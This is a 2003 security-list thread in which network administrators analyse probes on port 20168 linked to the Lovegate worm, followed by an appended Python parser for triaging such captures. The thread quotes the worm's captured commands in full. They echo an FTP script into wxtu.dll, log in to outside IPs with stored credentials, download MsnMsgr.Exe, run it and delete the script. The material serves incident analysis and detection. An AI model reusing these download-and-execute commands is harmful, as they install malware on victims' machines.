FW: New Worm or Worm Variant?

From: Bassett, Mark (mbassett_at_omaha.com)
Date: 12/11/03

    Date: Thu, 11 Dec 2003 12:22:02 -0600
    To: <incidents@securityfocus.com>

    Looks to me like it's building the wxtu.dll after it initializes the
    connection.

    And then it uses that built file as a command input to ftp.
    So it's doing ftp -n with input from wxtu.dll, which is below:

    open 211.26.130.118
    USER noxe
    Noxe
    Binary
    Get MsnMsgr.exe
    bye

    So it is just a simple ftp script to download an exploit.

    Mark Bassett
    Network Administrator
    World media company
    Omaha.com
    402-898-2079

    -----Original Message-----
    From: Charles Hamby [mailto:fixer@gci.net]
    Sent: Wednesday, December 10, 2003 1:36 PM
    To: incidents@securityfocus.com
    Subject: New Worm or Worm Variant?

    I've been seeing a jump in 20168/tcp scans over the past week or so.
    This port is commonly associated with the Lovegate worm. I recently set
    up a port listener using Netcat to capture
    any output from probes against a couple of my systems. Shown below are
    the results:

    echo open 211.26.130.118 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo
    noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >>
    wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll &
    start MsnMsgr.Exe

    echo open 211.26.132.172 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo
    noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >>
    wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll &
    start MsnMsgr.Exe

    At first glance it looks like some sort of non-interactive FTP session
    to download an exploit (MsnMsgr.Exe), but Googling for wxtu.dll came up
    empty (so this could be anything from a real .dll to a renamed
    executable in my mind). A couple of questions for the world at large:

    1) Has anyone run across anything like this before? This looks like
    something automated to me. Worm script, perhaps. The IP I set up the
    port listener on had roughly 20+ probes on 20168/tcp from noon yesterday
    to 7am this morning.

    2) Any theories on wxtu.dll? Since I can't get a hold of the malware to
    analyze it, I'm really guessing at this point. MsnMsgr.Exe seems to be
    the exploit itself, and it appears to be using something like FTPCOM to
    do a non-interactive FTP session, but wxtu.dll could be anything from a
    real .dll file to a renamed executable. Ideas?

    -cdh

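The captured command strings quoted above, as an added example that is not part of this thread: a small Python parser that replays the echo chain into the file handed to `ftp -s:`, then reads that reconstructed script to report which server the dropper contacts, which credentials it uses, what it fetches and what it runs, so probes like these can be triaged straight from a netcat capture. The sample payload is constructed from the first probe in the post.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: the first probe captured on 20168/tcp, re-joined onto one line as cmd.exe sees it.
CAPTURED_PROBE = (
    "echo open 211.26.130.118 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo noxe >> wxtu.dll"
    " & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll"
    " & ftp -n -s:wxtu.dll & del wxtu.dll & start MsnMsgr.Exe"
)

ECHO_RE = re.compile(r"^echo\s+(.*?)\s*>>\s*(\S+)$", re.I)   # echo <text> >> <file>
FTP_RE = re.compile(r"^ftp\b.*?-s:(\S+)", re.I)              # ftp ... -s:<script file>
START_RE = re.compile(r"^start\s+(\S+)", re.I)               # start <program>

@dataclass
class Dropper:
    script_file: str = ""                               # file passed to ftp -s:
    server: str = ""                                    # host from the 'open' line
    user: str = ""
    password: str = ""                                  # line answering the password prompt
    fetched: List[str] = field(default_factory=list)    # 'get' targets
    executed: List[str] = field(default_factory=list)   # 'start' targets

def parse_dropper(cmdline: str) -> Optional[Dropper]:
    """Rebuild every echo'd file, then interpret the one given to ftp -s:; None if not this pattern."""
    files: Dict[str, List[str]] = {}
    d = Dropper()
    for stmt in (s.strip() for s in cmdline.split("&")):
        if (m := ECHO_RE.match(stmt)):
            files.setdefault(m.group(2).lower(), []).append(m.group(1))
        elif (m := FTP_RE.match(stmt)):
            d.script_file = m.group(1)
        elif (m := START_RE.match(stmt)):
            d.executed.append(m.group(1))
    if not d.script_file:
        return None
    want_password = False   # with -n, the line after 'user' is consumed as the password
    for line in files.get(d.script_file.lower(), []):
        words = line.split()
        if want_password:
            d.password, want_password = line, False
        elif words and words[0].lower() == "open" and len(words) > 1:
            d.server = words[1]
        elif words and words[0].lower() == "user" and len(words) > 1:
            d.user, want_password = words[1], True
        elif words and words[0].lower() == "get" and len(words) > 1:
            d.fetched.append(words[1])
    return d
```

Feeding each captured line through `parse_dropper` gives one record per probe, so the distinct FTP servers and dropped file names can be logged or blocked without executing anything.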

